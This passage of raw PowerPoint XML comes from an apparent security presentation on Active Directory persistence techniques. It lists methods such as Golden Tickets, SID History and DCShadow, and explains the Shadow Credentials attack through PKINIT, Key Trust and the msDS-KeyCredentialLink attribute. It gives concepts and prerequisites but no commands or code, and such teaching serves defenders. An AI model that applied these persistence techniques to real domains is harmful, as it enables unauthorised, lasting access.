            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4187975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663" y="2219242"/>
            <a:ext cx="3695700" cy="2781300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389987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914801" y="383651"/>
            <a:ext cx="10058400" cy="848802"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>methods</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CuadroTexto 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755373" y="2353585"/>
            <a:ext cx="10535479" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ASREP/ SPN + KEBER – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Roasting</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Golden / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Silver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> Tickets</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Policy</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DACL </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Restore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> (DSRM) </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>SID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>History</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>AdminSDHolder</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Support</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Provider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> Api (SSP)</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1" smtClean="0"/>
              <a:t>DCShadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1492245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070" y="374374"/>
            <a:ext cx="8825659" cy="1981200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de texto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646070" y="1844702"/>
            <a:ext cx="8825659" cy="3029447"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Requirements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>least one Windows Server 2016 Domain Controller.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server 2016 Functional Level in Active Directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compromise an account with the delegated rights to write to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msDS-KeyCredentialLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute of the target object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176206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70809" y="1397748"/>
            <a:ext cx="9708302" cy="4062504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Título 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461376" y="176917"/>
            <a:ext cx="10058400" cy="1047997"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t> Bug</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2131150" y="1477553"/>
            <a:ext cx="6837721" cy="3902893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Marcador de texto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924367" y="5295568"/>
            <a:ext cx="11487620" cy="1121134"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/identity-protection/hello-for-business/hello-deployment-issues.md</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1617161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648" y="192186"/>
            <a:ext cx="10058400" cy="875963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t>WINDOWS HELLO FOR BUSINNESS</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de texto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546648" y="1302818"/>
            <a:ext cx="10879376" cy="1843186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Hello for Business</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHfB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>technology that replaces traditional passwords with PIN and/or Biometrics and linked with a cryptographic certificate key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pair. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These certificates grant single sign-on access to legacy Active Directory resources. </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1890667" y="3624547"/>
            <a:ext cx="3899498" cy="2016293"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7655391" y="3624547"/>
            <a:ext cx="2079553" cy="1823845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Marcador de texto 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546648" y="3566151"/>
            <a:ext cx="9018138" cy="1843186"/>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s-ES" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394985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3819" y="224554"/>
            <a:ext cx="10058400" cy="948791"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>Cert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t>-Trust vs Key-Trust</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de texto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383974" y="964103"/>
            <a:ext cx="11079426" cy="1484888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>PKINIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>preauthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mechanism for Kerberos 5 which uses X.509 certificates to authenticate the KDC to clients and vice versa. PKINIT can also be used to enable anonymity support, allowing clients to communicate securely with the KDC or with application servers without authenticating as a particular client principal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de texto 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383974" y="1350137"/>
            <a:ext cx="10737520" cy="1879600"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft also introduced the concept of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, to support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwordless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> authentication in environments that don’t support Certificate Trust. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Under the Key Trust model, PKINIT authentication is established based on the raw key data rather than a certificate.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8167478" y="3615771"/>
            <a:ext cx="3763952" cy="3198528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectángulo 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383974" y="2661664"/>
            <a:ext cx="10737520" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The client’s public key is stored in a multi-value attribute called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>msDS-KeyCredentialLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, introduced in Windows Server 2016. The values of this attribute are Key Credentials, which are serialized objects containing information such as the creation date, the distinguished name of the owner, a GUID that represents a Device ID, and, of course, the public key. It is a multi-value attribute because an account have several linked devices.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagen 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473819" y="3615975"/>
            <a:ext cx="3640217" cy="3188473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4203881" y="3615771"/>
            <a:ext cx="3781368" cy="3188677"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="865873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0258" y="296186"/>
            <a:ext cx="10058400" cy="840851"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>Public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>is</a:t>
            </a:r>
